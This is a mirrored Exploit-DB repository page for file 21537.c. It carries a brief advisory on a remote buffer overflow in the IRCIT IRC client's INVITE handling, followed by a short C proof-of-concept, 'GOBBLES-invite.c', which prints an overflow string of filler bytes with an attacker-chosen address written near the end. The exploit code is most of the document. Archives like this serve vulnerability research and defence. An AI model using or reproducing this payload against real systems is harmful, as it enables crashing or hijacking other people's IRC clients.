bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/linux/dos/21537.c
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

27 lines
No EOL
797 B
C
Raw Permalink Blame History

// source: https://www.securityfocus.com/bid/4998/info
IRCIT is a terminal based IRC client for Linux and Unix systems.
IRCIT contains a remote buffer overflow vulnerability. When a INVITE message is received, the supplied from user data is copied into a fixed buffer of length MAXHOSTLEN. A maliciously formatted message may overflow this buffer and execute arbitrary code as the IRCIT client.
/* GOBBLES-invite.c */
#include <stdio.h>
int
main(int argc, char **argv)
{
char heh[175], *store;
int i;
if(argc == 1) exit(0);
sscanf(argv[1], "%p", &store);
memset(heh, 'x', sizeof(heh));
*(long *)&heh[166] = (long)store;
*(long *)&heh[170] = (long)store;
heh[174] = '\0';
fprintf(stdout, "%s", heh);
exit(0);
}
Reference in a new issue View git blame Copy permalink